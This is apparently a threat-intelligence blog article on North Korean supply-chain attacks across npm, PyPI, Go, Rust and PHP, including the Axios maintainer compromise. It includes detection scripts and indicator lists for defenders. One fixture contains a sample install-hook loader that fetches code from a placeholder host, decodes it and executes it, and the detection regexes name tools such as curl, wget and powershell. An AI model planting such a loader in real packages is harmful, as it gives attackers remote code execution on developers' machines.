North Korea Hid 1,700 Malicious Packages Inside Your Dev Team's Tools
npm. PyPI. Go. Rust. PHP. All five ecosystems. Simultaneously. North Korea's Contagious Interview operation just executed the most comprehensive open-source supply chain poisoning campaign ever documented — and then compromised Axios, the JavaScript library with 100 million weekly downloads.

Founder & Cybersecurity Evangelist
Socket Security researcher Kirill Boychenko published intelligence on April 7, 2026 documenting a new cluster within North Korea's long-running Contagious Interview campaign: twelve confirmed malicious packages and two sleeper packages deployed simultaneously across npm, PyPI, Go Modules, crates.io (Rust), and Packagist (PHP). All reused the same staging infrastructure and loader patterns. All functioned as malware loaders designed to fetch platform-specific second-stage payloads delivering infostealers and remote access trojans.
This is not a new campaign. It is an expansion of one. Socket's tracker for Contagious Interview now lists more than 1,700 malicious packages tied to the activity. The April cluster is a small slice of that total — but it is the first time the operation has been documented pushing coordinated, simultaneous packages across five separate registries using shared infrastructure and identical loader logic.
And that is only half the story. A separate, more consequential operation targeted Axios, the most popular JavaScript HTTP client in the world and present in an estimated 80% of cloud environments, by compromising its lead maintainer through a weeks-long social engineering campaign and then using the stolen publishing credential to push backdoored releases of a package with 100 million weekly downloads.
The packages: what was confirmed across five ecosystems
The packages were published under GitHub aliases including golangorg, aokisasakidev, and aokisasakidev1, with supporting persona networks under maxcointech1010 and maxcointech0000. They impersonated common developer utilities — debug loggers, license validators, HTTP libraries — names chosen because they sound like the kind of thing a developer installs without a second thought.
Socket reported all identified live packages to the affected registries and submitted takedown requests for associated GitHub accounts. The crates.io security team removed logtrace under advisory RUSTSEC-2026-0081. The Go Security team blocked the identified malicious modules. The npm security team removed the aokisasakidev packages. At time of reporting, some packages had been removed. Others remained live.
| Package(s) | Registry | Status |
|---|---|---|
| dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, debug-glitz | npm (registry.npmjs.org) | Confirmed malicious; remove immediately |
| logutilkit, apachelicense, fluxhttp, license-utils-kit | PyPI (pypi.org) | Confirmed malicious; remove immediately |
| golangorg/formstash, aokisasakidev/mit-license-pkg | Go (pkg.go.dev) | Blocked by the Go Security team |
| logtrace | Rust (crates.io) | Removed under RUSTSEC-2026-0081 |
| golangorg/logkit | PHP (packagist.org) | Confirmed malicious; remove immediately |
Any instance of msimg32.dll found outside C:\Windows\System32 is an active IOC. Isolate the host immediately. Full hashes and IOC lists are available via the Cisco Talos GitHub repository.
The Axios operation: when North Korea compromised 100 million downloads
The Contagious Interview cross-ecosystem cluster is only one part of a broader offensive. A separate, even more consequential operation targeted Axios — the most popular JavaScript HTTP client library in the world, with approximately 100 million weekly downloads and present in an estimated 80% of cloud environments.
This attack was not a fake package. It was a compromised legitimate one. UNC1069 ran a multi-week social engineering campaign targeting Jason Saayman, the lead maintainer of Axios. They built rapport across messaging platforms, masqueraded as credible contacts, and eventually delivered a remote access trojan that gave them persistent access to his development environment — and the long-lived npm access token that Axios used for publishing.
The Axios maintainer described the campaign as 'extremely well coordinated, looked legit, and was done in a professional manner.' Any engineer who maintains open-source packages with high download counts is a priority target.
Weeks prior — Social engineering campaign begins
UNC1069 builds rapport with Axios maintainer Jason Saayman via Telegram, LinkedIn, and Slack, impersonating credible contacts. A convincing fake meeting link delivers a RAT, giving persistent access to his workstation and the long-lived npm publishing token.
Mar 30, 05:57 UTC — Decoy package pre-staged
A clean plain-crypto-js@4.2.0 is published 18 hours ahead of the payload so that the package name has a benign publishing history on npm before the backdoored version lands. Deliberate pre-staging, not opportunism.
Mar 30, 23:59 UTC — Payload version published
plain-crypto-js@4.2.1 — containing the SILKBELL dropper and WAVESHAPER.V2 RAT — is published to npm.
Mar 31, 00:21 UTC — Axios account takeover and poisoned release
Using the stolen long-lived npm token, the attacker publishes axios@1.14.1 and axios@0.30.4, injecting plain-crypto-js@4.2.1 as a runtime dependency. The maintainer's account email is changed to ifstap@proton.me, locking out the legitimate developer. Any install that re-resolves a range such as ^1.14.0 or ^0.30.0 (a fresh install with no lock file, an npm update, or a lock file that does not already pin axios) now picks up the backdoored version; a committed lock file that still pins 1.14.0 or 0.30.3 keeps the clean one.
Mar 31, 01:50 UTC — Elastic Security detects and discloses
Elastic's automated supply-chain monitoring flags the compromise (Elastic reports detection within approximately six minutes of the malicious publish). Elastic files a GitHub Security Advisory and coordinates disclosure with npm and the Axios maintainers.
Mar 31, 03:20 UTC — Malicious versions removed
Both backdoored versions are taken down roughly three hours after publication. Any environment that ran an install during that window and resolved axios to 1.14.1 or 0.30.4 should be treated as fully compromised.
Apr 1, 2026 — Google GTIG formally attributes to UNC1069
Google's Threat Intelligence Group publicly attributes the Axios compromise to UNC1069, a financially motivated North Korea-nexus threat actor active since 2018, based on WAVESHAPER.V2 usage and C2 infrastructure overlaps.
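The timeline entry for the poisoned release says a manifest range such as ^1.14.0 pulls in the backdoored 1.14.1. The resolver below, written for this article and not taken from npm or the Axios project, implements the caret and tilde rules npm applies so that claim can be checked, and shows the one thing that stops it: a lock file whose entry still satisfies the range. The version list is a constructed registry snapshot, not a live query.

```javascript
'use strict';
// Added example, not code from the article, npm or the Axios project: a minimal
// resolver for npm caret (^) and tilde (~) ranges. The version list is a
// constructed snapshot, not a live registry query.

function parse(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  if (!m) throw new Error(`unsupported version: ${v}`); // no prerelease/build tags here
  return m.slice(1).map(Number);
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// Exclusive upper bound of a range, following npm's rules:
//   ^X.Y.Z -> <(X+1).0.0 if X>0; <0.(Y+1).0 if X==0 and Y>0; <0.0.(Z+1) otherwise
//   ~X.Y.Z -> <X.(Y+1).0
function upperBound(spec) {
  const op = spec[0];
  const [x, y, z] = parse(spec.slice(1));
  if (op === '~') return [x, y + 1, 0];
  if (op !== '^') throw new Error(`unsupported specifier: ${spec}`);
  if (x > 0) return [x + 1, 0, 0];
  if (y > 0) return [0, y + 1, 0];
  return [0, 0, z + 1];
}

function satisfies(spec, version) {
  if (/^\d/.test(spec)) return cmp(parse(spec), parse(version)) === 0; // exact pin
  const v = parse(version);
  return cmp(v, parse(spec.slice(1))) >= 0 && cmp(v, upperBound(spec)) < 0;
}

// npm takes the highest published version that satisfies the range.
function resolve(spec, available) {
  const ok = available.filter(v => satisfies(spec, v)).map(parse).sort(cmp);
  return ok.length ? ok[ok.length - 1].join('.') : null;
}

// What an install actually uses: a lock file entry that still satisfies the
// manifest range is kept; only without one is the range re-resolved.
function installedVersion(spec, lockedVersion, available) {
  if (lockedVersion && satisfies(spec, lockedVersion)) return lockedVersion;
  return resolve(spec, available);
}

// Constructed registry snapshot: the two backdoored tags next to the versions
// that preceded them.
const AXIOS_VERSIONS = ['0.30.3', '0.30.4', '1.14.0', '1.14.1'];

function demo() {
  return {
    caret1x: resolve('^1.14.0', AXIOS_VERSIONS),                     // '1.14.1'
    caret0x: resolve('^0.30.0', AXIOS_VERSIONS),                     // '0.30.4': caret on 0.x stays within 0.30.*
    pinned: resolve('1.14.0', AXIOS_VERSIONS),                       // '1.14.0'
    withLock: installedVersion('^1.14.0', '1.14.0', AXIOS_VERSIONS), // '1.14.0': the lock file wins
    noLock: installedVersion('^1.14.0', null, AXIOS_VERSIONS),       // '1.14.1'
  };
}

console.log(demo());
```

The last two results are the whole point: a lock file that already pinned 1.14.0 was protective during the exposure window, because npm install keeps a locked version that still satisfies the range; npm update, a missing lock, or a lock that never recorded axios re-resolves the range and lands on the newest tag. npm ci goes one step further and refuses to run when the lock and package.json disagree.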
The payload: WAVESHAPER.V2
The second-stage payload deployed across both the ecosystem packages and the Axios compromise is WAVESHAPER.V2 — a cross-platform RAT with variants for Windows (PowerShell), macOS (native C++ Mach-O binary), and Linux (Python). It is a direct evolution of WAVESHAPER, a backdoor previously attributed exclusively to UNC1069 and historically deployed against the cryptocurrency sector.
Once installed, WAVESHAPER.V2 beacons to its C2 server every 60 seconds, sending Base64-encoded JSON. The hard-coded user-agent spoofs Internet Explorer 8 on Windows XP, a trivially detectable anomaly in proxy and NDR logs on any modern network, and an outright impossibility when the source host is macOS or Linux.
WAVESHAPER.V2 supports four commands: kill (terminate the process), rundir (enumerate directory listings), runscript (execute AppleScript, PowerShell, or shell commands), and peinject (execute arbitrary binaries in memory). Target data: cloud credentials, SSH keys, AWS secrets, Kubernetes tokens, and cryptocurrency wallet files.
| Artifact | Platform and role | Note |
|---|---|---|
| /Library/Caches/com.apple.act.mond | macOS, WAVESHAPER.V2 Mach-O RAT | Disguised as an Apple system cache file |
| %PROGRAMDATA%\wt.exe | Windows, renamed PowerShell executable | Name mimics Windows Terminal |
| %PROGRAMDATA%\system.bat | Windows, hidden batch file | Persistence mechanism |
| HKCU:\...\Run\MicrosoftUpdate | Windows, registry Run key | WAVESHAPER.V2 persistence |
| /tmp/ld.py | Linux, Python RAT | Launched via nohup so it outlives the parent shell |
| sfrclak[.]com / 142.11.206.73 | C2, all platforms | Block at firewall and DNS layer immediately |
| axios@1.14.1 or axios@0.30.4 in a lock file | npm, backdoored Axios versions | Treat as full compromise if found in any lock file |
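The beacon cadence and user-agent described above are detection content. The script below, an added example and not tooling from Elastic, Google or the article, runs the three checks a hunter would script over proxy records: the anachronistic IE8-on-Windows-XP user-agent, a 60-second check-in rhythm per source/destination pair, and a match against the published C2 indicator. The log lines and the exact user-agent string are constructed for the demo (the article only says the UA spoofs IE8 on XP, so the string is an assumption).

```javascript
'use strict';
// Added example, not tooling from the article or any vendor: hunt for the
// WAVESHAPER.V2 beacon pattern in web-proxy records. Log lines and the exact
// user-agent string are constructed for the demo.

const C2_INDICATORS = new Set(['sfrclak.com', '142.11.206.73']);
const IE8_XP = /MSIE 8\.0;\s*Windows NT 5\.1/; // assumed form of the spoofed UA

// Constructed proxy log: "<ISO time> <src> <dst host> <method> <user-agent>"
const SAMPLE_LOG = `
2026-03-31T02:00:00Z 10.0.0.15 sfrclak.com POST Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2026-03-31T02:00:01Z 10.0.0.22 registry.npmjs.org GET npm/10.8.2 node/v20.11.0 linux x64
2026-03-31T02:01:00Z 10.0.0.15 sfrclak.com POST Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2026-03-31T02:01:30Z 10.0.0.22 api.github.com GET curl/8.5.0
2026-03-31T02:02:00Z 10.0.0.15 sfrclak.com POST Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2026-03-31T02:03:01Z 10.0.0.15 sfrclak.com POST Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2026-03-31T02:05:00Z 10.0.0.31 updates.example.net GET Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
`;

function parseLine(line) {
  const m = /^(\S+) (\S+) (\S+) (\S+) (.*)$/.exec(line.trim());
  if (!m) return null;
  return { ts: Date.parse(m[1]), src: m[2], dst: m[3], method: m[4], ua: m[5] };
}

function parseLog(text) {
  return text.split('\n').map(parseLine).filter(Boolean);
}

// Periodicity: for each (src,dst) pair with at least minHits requests, take the
// gaps between consecutive hits and flag when their median sits within
// `tolerance` seconds of `period`. A 60 s sleep loop with a second or two of
// jitter still lands here; interactive browsing does not.
function findBeacons(records, { period = 60, tolerance = 5, minHits = 3 } = {}) {
  const byPair = new Map();
  for (const r of records) {
    const key = `${r.src}->${r.dst}`;
    if (!byPair.has(key)) byPair.set(key, []);
    byPair.get(key).push(r.ts);
  }
  const beacons = [];
  for (const [key, times] of byPair) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => (t - times[i]) / 1000).sort((a, b) => a - b);
    const median = gaps[Math.floor(gaps.length / 2)];
    if (Math.abs(median - period) <= tolerance) {
      const [src, dst] = key.split('->');
      beacons.push({ src, dst, hits: times.length, medianGapSeconds: median });
    }
  }
  return beacons;
}

// Per-record flags: known C2 indicator and the anachronistic user-agent.
function flagRecords(records) {
  return records
    .map(r => {
      const reasons = [];
      if (C2_INDICATORS.has(r.dst)) reasons.push('known-c2');
      if (IE8_XP.test(r.ua)) reasons.push('ie8-xp-user-agent');
      return { ...r, reasons };
    })
    .filter(r => r.reasons.length > 0);
}

// Verdict per source host: which hosts need isolation, and every reason why.
function triage(text) {
  const records = parseLog(text);
  const verdict = new Map();
  const add = (src, reason) => {
    if (!verdict.has(src)) verdict.set(src, new Set());
    verdict.get(src).add(reason);
  };
  for (const r of flagRecords(records)) for (const why of r.reasons) add(r.src, why);
  for (const b of findBeacons(records)) add(b.src, `beacon-${b.medianGapSeconds}s-to-${b.dst}`);
  return Object.fromEntries([...verdict].map(([src, set]) => [src, [...set].sort()]));
}

console.log(triage(SAMPLE_LOG));
```

Against the sample, 10.0.0.15 trips all three checks and is an isolate-now host; 10.0.0.31 trips only the user-agent rule, which on its own is a lead to follow rather than a verdict, since the periodicity and indicator checks are what separate a real beacon from a stray legacy client. The indicator set is the one the article publishes; extend it from the full IOC list before running this at scale.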
The threat actor: UNC1069 / Sapphire Sleet / BlueNoroff
The operation is attributed with high confidence to UNC1069, a financially motivated North Korea-nexus threat actor that Google's Mandiant unit has tracked since at least 2018. The group overlaps with several other tracked aliases across different vendor naming conventions, all describing the same cluster of activity: Sapphire Sleet, BlueNoroff, Stardust Chollima, Alluring Pisces, CageyChameleon, CryptoCore, MASAN, and GhostCall.
UNC1069's defining characteristic, per Microsoft, is running multi-week, low-pressure social engineering campaigns across Telegram, LinkedIn, and Slack, impersonating known contacts or credible brands, or operating from previously compromised accounts, before delivering a fraudulent Zoom or Microsoft Teams meeting link.
The Security Alliance (SEAL) blocked 164 UNC1069-linked domains impersonating Microsoft Teams and Zoom services between February 6 and April 7, 2026 alone.
“What we are seeing consistently is ongoing evolution in how DPRK-linked, financially motivated actors operate — shifts in tooling, infrastructure, and targeting — but with clear continuity in behavior and intent.”
— Microsoft Threat Intelligence — Direct Assessment
Why your CI/CD pipeline is the real attack surface
Supply chain attacks against developer tooling work because of a fundamental assumption baked into modern software delivery: that packages from trusted registries can be installed automatically without manual review. CI/CD pipelines pull dependencies, resolve version ranges, and run install hooks without pausing to ask whether the code being fetched is safe.
The install hook is particularly significant. npm lifecycle scripts (preinstall, install, postinstall, prepare) run arbitrary code the moment a package is installed, and Python source distributions do the same through setup.py, before the developer ever imports or runs the package's advertised functionality. In the Axios attack, the malicious payload executed via plain-crypto-js's postinstall hook the moment npm install ran. The developer never saw a prompt, never ran the malicious code explicitly, and in many cases never knew the package was installed at all, because it was a transitive dependency two levels deep: application to axios to plain-crypto-js.
What made the Axios attack possible was a compound weakness in the trust model. The Axios project had adopted OIDC Trusted Publishing, which is the correct modern approach. But a long-lived NPM_TOKEN was still present in the GitHub Actions workflow environment, and the registry still honoured it. The npm client uses a configured token in preference to the OIDC exchange, and, more to the point, anyone holding that token can publish from any machine at all. The attacker, who had taken the token from the maintainer's compromised workstation, never needed to touch the OIDC path. Trusted Publishing adds a safe channel; it does not close the unsafe one until the classic token is revoked and token-based publishing is disabled for the package.
“This is a well-resourced, prolific, systematic factory-model supply chain threat that treats npm, PyPI, and VS Code as renewable initial access channels into developer environments.”
— Socket Security — April 7, 2026
What to do right now
Eight immediate actions for your security and engineering teams:
Check for compromised Axios versions immediately
Search all repositories, CI build logs, and lock files for axios@1.14.1 or axios@0.30.4; in a checked-out project, npm ls axios plain-crypto-js shows what is actually installed, including transitive copies. Any environment that installed these versions during the exposure window (March 31, 00:21 to 03:20 UTC) should be treated as fully compromised. Safe downgrade targets: axios@1.14.0 (1.x users) or axios@0.30.3 (0.x users). Remove plain-crypto-js from all node_modules directories, and purge it from local npm caches and any private registry mirror or proxy, which keep serving a cached tarball after the public registry has pulled it.
Hunt for WAVESHAPER.V2 artifacts across your endpoints
Search for: /Library/Caches/com.apple.act.mond (macOS), %PROGRAMDATA%\wt.exe (Windows), /tmp/ld.py (Linux), %PROGRAMDATA%\system.bat (Windows), and the registry key HKCU:\...\Run\MicrosoftUpdate. Block outbound traffic to sfrclak[.]com and 142.11.206.73 at firewall and DNS layers. If any artifact is found, assume full compromise and rotate all credentials immediately.
Cross-reference all dependencies against the confirmed package list
Check npm for: dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, debug-glitz. Check PyPI for: logutilkit, apachelicense, fluxhttp, license-utils-kit. Check Go for: golangorg/formstash, aokisasakidev/mit-license-pkg. Check Rust for: logtrace. Check PHP/Packagist for: golangorg/logkit. Full IOC lists maintained at socket.dev.
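Both the Axios check and the package cross-reference above come down to the same job: walking lock files for names and exact versions. The scanner below is an added example, not tooling from Socket or the article. It handles package-lock.json (the v2/v3 packages map, with a fallback for the nested v1 tree) and reports the dependency chain so a transitive hit is visible as such, and does a line-oriented name match over the plain-text manifests of the other four registries. Sample files are constructed for the demo; the Go match is by path suffix because the article lists the modules as golangorg/... without the host prefix a go.mod carries.

```javascript
'use strict';
// Added example, not tooling from Socket or the article: scan lock files and
// manifests for the indicators listed in this section. Sample inputs are
// constructed for the demo.

// Exact backdoored tags of otherwise legitimate packages.
const BACKDOORED_VERSIONS = {
  axios: new Set(['1.14.1', '0.30.4']),
  'plain-crypto-js': new Set(['4.2.1']),
};
// Packages malicious in every version, by registry (the April cluster).
const MALICIOUS_NAMES = {
  npm: new Set(['dev-log-core', 'logger-base', 'logkitx', 'pino-debugger', 'debug-fmt', 'debug-glitz']),
  pypi: new Set(['logutilkit', 'apachelicense', 'fluxhttp', 'license-utils-kit']),
  go: new Set(['golangorg/formstash', 'aokisasakidev/mit-license-pkg']),
  cargo: new Set(['logtrace']),
  packagist: new Set(['golangorg/logkit']),
};

function isListed(name, registry) {
  const n = name.toLowerCase();
  // Go module paths carry a host prefix (github.com/...), so match on suffix.
  return MALICIOUS_NAMES[registry].has(n) ||
    (registry === 'go' && [...MALICIOUS_NAMES.go].some(s => n.endsWith('/' + s)));
}

function classifyNpm(name, version) {
  if (isListed(name, 'npm')) return 'malicious-package';
  if (BACKDOORED_VERSIONS[name] && BACKDOORED_VERSIONS[name].has(version)) return 'backdoored-version';
  return null;
}

// lockfile v2/v3: keys are install paths such as
// "node_modules/a/node_modules/axios"; the path doubles as the dependency chain.
function scanPackagesMap(packages) {
  const hits = [];
  for (const [key, meta] of Object.entries(packages)) {
    if (!key.startsWith('node_modules/')) continue; // "" is the root project entry
    const chain = key.split('node_modules/').filter(Boolean).map(s => s.replace(/\/$/, ''));
    const name = chain[chain.length - 1];
    const verdict = classifyNpm(name, meta.version);
    if (verdict) hits.push({ name, version: meta.version, path: chain.join(' > '), verdict });
  }
  return hits;
}

// lockfile v1: nested "dependencies" objects, recursed with the chain so far.
function scanV1Deps(deps, chain, hits) {
  for (const [name, meta] of Object.entries(deps || {})) {
    const path = [...chain, name];
    const verdict = classifyNpm(name, meta.version);
    if (verdict) hits.push({ name, version: meta.version, path: path.join(' > '), verdict });
    scanV1Deps(meta.dependencies, path, hits);
  }
  return hits;
}

function scanNpmLock(lock) {
  return lock.packages ? scanPackagesMap(lock.packages) : scanV1Deps(lock.dependencies, [], []);
}

// Other registries: a name match per line over requirements.txt, go.mod,
// Cargo.lock ([[package]] name = "...") or composer.lock ("name": "...").
function scanTextManifest(text, registry) {
  const hits = [];
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    const m = /^name\s*=\s*"([^"]+)"/.exec(line) ||
      /^"name":\s*"([^"]+)"/.exec(line) ||
      /^(?:require\s+)?(\S+\/\S+)\s+v\d/.exec(line) ||
      /^([A-Za-z0-9_.-]+)\s*(?:[=<>!~;\[]|$)/.exec(line);
    if (m && isListed(m[1], registry)) hits.push({ name: m[1], registry, verdict: 'malicious-package' });
  }
  return hits;
}

// Constructed package-lock.json (v3): axios arrives two levels down.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-app', version: '1.0.0' },
    'node_modules/my-http-wrapper': { version: '2.3.0' },
    'node_modules/my-http-wrapper/node_modules/axios': { version: '1.14.1' },
    'node_modules/my-http-wrapper/node_modules/axios/node_modules/plain-crypto-js': { version: '4.2.1' },
    'node_modules/express': { version: '4.19.2' },
    'node_modules/debug-fmt': { version: '0.0.3' },
  },
};
const SAMPLE_REQUIREMENTS = 'requests==2.32.3\nfluxhttp>=0.1\nlogutilkit\n';
const SAMPLE_GOMOD = 'module example.com/app\n\ngo 1.22\n\nrequire github.com/golangorg/formstash v0.1.0\n';

console.log(scanNpmLock(SAMPLE_LOCK));
console.log(scanTextManifest(SAMPLE_REQUIREMENTS, 'pypi'), scanTextManifest(SAMPLE_GOMOD, 'go'));
```

Run it over every lock file in a monorepo, not only the top-level one: a workspace package or a vendored tool can carry its own lock. The reported path is what turns a hit into a remediation, because the fix for my-http-wrapper > axios is an override or an upstream bump, not an edit to package.json.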
Pin direct and transitive dependencies to known-good versions
Ranges such as ^ and ~ are only dangerous when something re-resolves them, so the fix has two parts. Commit a lock file, and in CI install with npm ci rather than npm install: npm ci installs exactly what the lock records and fails if package.json and the lock disagree, whereas npm install will quietly re-resolve. For critical dependencies also drop the caret and tilde specifiers so that a routine npm update cannot walk onto a fresh release. Lock transitive dependencies explicitly too; the Axios attack succeeded through a dependency two levels down that most teams would never review by hand.
Flag any utility package that contacts remote infrastructure on install
Treat as malicious until proven otherwise any package that contacts remote infrastructure during installation, retrieves a downloadUrl, rewrites cloud-storage links, downloads archives, decodes remote content, or spawns interpreters or binaries from an install hook. This is the defining signature of the Contagious Interview loader design. Installing with --ignore-scripts (or ignore-scripts=true in .npmrc) in CI, and running the handful of build steps that genuinely need lifecycle scripts explicitly, removes that execution channel entirely.
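A heuristic version of that rule, written for this article rather than taken from Socket: inspect each package's lifecycle scripts and the local file they invoke for a network fetch combined with decoding or interpreter spawning, and only call the combination a loader pattern. The node_modules snapshot, package names and script bodies are constructed for the demo (dbg-logger-shim, left-pad-ish and native-addon are placeholders, not real packages). Packages that legitimately download prebuilt binaries at install time will trip the network rule too, which is why the verdict for a lone install hook is "review" and why such packages belong on an explicit allowlist.

```javascript
'use strict';
// Added example, not tooling from Socket or the article: a heuristic audit of
// npm lifecycle scripts for install-time loader behaviour. The package tree
// and script bodies are constructed for the demo.

const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each rule is a regex over the script command plus the local file it runs.
const RULES = [
  ['spawns-interpreter', /\b(?:node\s+-e|python3?|powershell(?:\.exe)?|pwsh|sh\s+-c|bash\s+-c|cmd(?:\.exe)?\s+\/c|osascript)\b/i],
  ['network-fetch', /https?:\/\/|\bcurl\b|\bwget\b|\bfetch\(|\bhttps?\.(?:get|request)\(|downloadUrl/i],
  ['decodes-payload', /Buffer\.from\([^)]*['"]base64['"]|\batob\(|base64\s+(?:-d|--decode)\b|FromBase64String/i],
  ['child-process', /\brequire\(['"]child_process['"]\)|from\s+['"]child_process['"]|\b(?:execSync|spawnSync|spawn|exec|execFile)\(/],
  ['eval-or-function', /\beval\(|new\s+Function\(/],
];

// Constructed node_modules snapshot: package name -> { manifest, files }.
const SAMPLE_TREE = {
  'dbg-logger-shim': {
    manifest: { name: 'dbg-logger-shim', version: '1.0.2', scripts: { postinstall: 'node setup.js' } },
    files: {
      'setup.js': [
        "const https = require('https');",
        "const { execSync } = require('child_process');",
        "https.get('https://stage.example.invalid/manifest', res => {",
        "  let b = ''; res.on('data', c => b += c);",
        "  res.on('end', () => {",
        '    const body = JSON.parse(b);',
        "    const code = Buffer.from(body.downloadUrl, 'base64').toString();",
        '    execSync(`python3 -c "${code}"`);',
        '  });',
        '});',
      ].join('\n'),
    },
  },
  'left-pad-ish': {
    manifest: { name: 'left-pad-ish', version: '3.0.0', scripts: { test: 'node test.js' } },
    files: { 'test.js': "console.log('ok');" },
  },
  'native-addon': {
    manifest: { name: 'native-addon', version: '2.1.0', scripts: { install: 'node-gyp rebuild' } },
    files: {},
  },
};

// The local file a command points at ("node setup.js" -> setup.js), if we have
// it; otherwise only the command text itself is inspected.
function referencedFile(command, files) {
  const m = /(?:^|\s)(?:node\s+)?(\S+\.(?:js|cjs|mjs|sh|py|ps1))\b/.exec(command);
  return m && files[m[1]] !== undefined ? files[m[1]] : '';
}

function auditPackage(name, { manifest, files }) {
  const findings = [];
  for (const hook of LIFECYCLE) {
    const command = manifest.scripts && manifest.scripts[hook];
    if (!command) continue;
    const text = command + '\n' + referencedFile(command, files);
    const matched = RULES.filter(([, re]) => re.test(text)).map(([label]) => label);
    findings.push({ name, hook, command, matched });
  }
  return findings;
}

// "loader-pattern" needs a network rule plus something that decodes or runs what
// came back; any other install hook is "review" (allowlist the legitimate ones).
function verdict(findings) {
  const labels = new Set(findings.flatMap(f => f.matched));
  const executes = ['spawns-interpreter', 'child-process', 'eval-or-function', 'decodes-payload']
    .some(l => labels.has(l));
  if (labels.has('network-fetch') && executes) return 'loader-pattern';
  return findings.length ? 'review' : 'clean';
}

function auditTree(tree) {
  return Object.fromEntries(Object.entries(tree).map(([name, pkg]) => {
    const findings = auditPackage(name, pkg);
    return [name, { verdict: verdict(findings), findings }];
  }));
}

console.log(JSON.stringify(auditTree(SAMPLE_TREE), null, 2));
```

To run this against a real checkout, build the tree by reading each node_modules/*/package.json and the files next to it; the regexes are deliberately broad, so treat a loader-pattern verdict as a reason to read the script, not as proof on its own, and keep the allowlist of known binary-fetching packages under review.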
Audit CI/CD pipeline runs for the affected time windows
Review CI logs from March 31, 2026 and any build run that installed one of the confirmed malicious packages. Pay particular attention to runs on ephemeral runners or in throwaway containers: the runner is gone, the malware self-deletes after execution, and the only record left is the install log and whatever secrets the job could reach. Rotate any cloud credentials, SSH keys, AWS secrets, or Kubernetes tokens accessible from affected build environments.
Eliminate long-lived npm tokens from your publishing workflows
Audit all GitHub Actions and CI workflows that publish to npm, PyPI, crates.io, or other registries. Remove long-lived tokens, revoke them at the registry, and enforce OIDC-only publishing. Where the registry offers it, as npm does in a package's publishing-access settings, require 2FA and disallow token-based publishing outright. The Axios attack bypassed OIDC Trusted Publishing precisely because a long-lived NPM_TOKEN was still present and still accepted. A stolen token that cannot be used to publish is not an attack vector.
Educate engineering teams about UNC1069's social engineering playbook
UNC1069 runs multi-week, low-pressure campaigns on Telegram, LinkedIn, and Slack — impersonating known contacts, credible brands, and previously compromised accounts — before delivering a fake Zoom or Teams meeting link. Any engineer who maintains open-source packages with high download counts is a priority target.
The bottom line
The combination of the Contagious Interview ecosystem packages and the Axios maintainer compromise tells a coherent strategic story. The lookalike-package campaign requires a developer to make a mistake: installing the wrong package. The maintainer compromise required no developer mistake at all. It required only that Axios had 100 million weekly downloads, that its maintainer was reachable on Telegram and LinkedIn, and that a long-lived npm token existed as a fallback.
North Korea has built a factory-model capability for poisoning open-source supply chains at scale — 1,700 packages across five ecosystems, with shared infrastructure, identical loader logic, and now confirmed access to a library present in 80% of cloud environments. The capability is fully operational.
The correct response is not to treat this as an npm problem or a Python problem or a Go problem. It is a trust model problem that runs through every package registry where automated CI/CD systems install dependencies without human review. The attack surface is every software project that has ever run npm install, pip install, go get, cargo add, or composer require — and resolved a version range automatically.
Any environment that ran npm install between March 31, 00:21 and 03:20 UTC and resolved to axios@1.14.1 or axios@0.30.4 should be treated as fully compromised regardless of whether active C2 communication was observed. The malware self-deletes after execution. Absence of artifacts does not mean absence of compromise.

Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.